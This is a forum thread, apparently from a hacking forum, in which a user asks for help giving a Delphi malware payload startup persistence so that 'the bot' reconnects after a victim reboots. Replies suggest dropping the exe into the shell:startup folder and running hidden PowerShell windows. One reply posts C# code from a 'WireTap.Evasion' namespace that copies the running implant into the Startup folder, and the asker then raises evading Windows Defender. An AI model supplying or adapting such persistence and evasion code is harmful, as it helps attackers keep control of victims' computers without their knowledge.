Add startup to an EXE payload?

[Evild34d]

Hi,

I have a malware payload which is coded in delphi, without startup. I need your help to add startup to the payload(exe), any code/method that work please! only adding startup is enough.

Thanks for any help

 

[Evild34d]

copy the exe file to the 'shell:startup' folder

Посмотреть вложение 77129

So using this method the startup feature will connect the bot again when the user pc restart? Thanks

 

[MY1G]

So using this method the startup feature will connect the bot again when the user pc restart? Thanks

-WindowStyle Hidden

https:// www(dot)hanselman(dot)com /blog/running-powershell-scripts-from-the-command-line-in-a-hidden-window

https:// www(dot)codeproject(dot)com /Questions/884878/how-to-start-the-windows-application-when-the-star

reaction is appreciated

 

[Shaurmist25]

using System;
using System.IO;
using System.Reflection;

namespace WireTap.Evasion
{
    internal sealed class Startup
    {

        /// <summary>
        /// Current executable location
        /// </summary>
        private static readonly FileInfo CurrentExecutable = new FileInfo(Assembly.GetExecutingAssembly().Location);

        /// <summary>
        /// Shell startup directory path
        /// Any file in this dir will be executed after user logged in.
        /// </summary>
        private static readonly DirectoryInfo ShellStartupDirectory = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup));


        /// <summary>
        /// Installs the application by copying the current executable to the Shell Startup directory.
        /// </summary>
        public static string Install()
        {
            FileInfo ImplantShellStartupExecutable = new FileInfo(Path.Combine(ShellStartupDirectory.FullName, CurrentExecutable.Name));

            // Create startup dir if not exists
            if (!ShellStartupDirectory.Exists)
            {
                ShellStartupDirectory.Create();
            }

            // If the executable does not already exist in the Shell Startup directory, copy it there.
            if (!ImplantShellStartupExecutable.Exists)
            {
                CurrentExecutable.CopyTo(ImplantShellStartupExecutable.FullName);
#if DEBUG
                Console.WriteLine("Implant installed");
#endif
                return ImplantShellStartupExecutable.FullName;
            }
            return null;
        }
    }
}

 

[Evild34d]

using System;
using System.IO;
using System.Reflection;

namespace WireTap.Evasion
{
    internal sealed class Startup
    {

        /// <summary>
        /// Current executable location
        /// </summary>
        private static readonly FileInfo CurrentExecutable = new FileInfo(Assembly.GetExecutingAssembly().Location);

        /// <summary>
        /// Shell startup directory path
        /// Any file in this dir will be executed after user logged in.
        /// </summary>
        private static readonly DirectoryInfo ShellStartupDirectory = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup));


        /// <summary>
        /// Installs the application by copying the current executable to the Shell Startup directory.
        /// </summary>
        public static string Install()
        {
            FileInfo ImplantShellStartupExecutable = new FileInfo(Path.Combine(ShellStartupDirectory.FullName, CurrentExecutable.Name));

            // Create startup dir if not exists
            if (!ShellStartupDirectory.Exists)
            {
                ShellStartupDirectory.Create();
            }

            // If the executable does not already exist in the Shell Startup directory, copy it there.
            if (!ImplantShellStartupExecutable.Exists)
            {
                CurrentExecutable.CopyTo(ImplantShellStartupExecutable.FullName);
#if DEBUG
                Console.WriteLine("Implant installed");
#endif
                return ImplantShellStartupExecutable.FullName;
            }
            return null;
        }
    }
}

Thanks but this will not cause WD detection!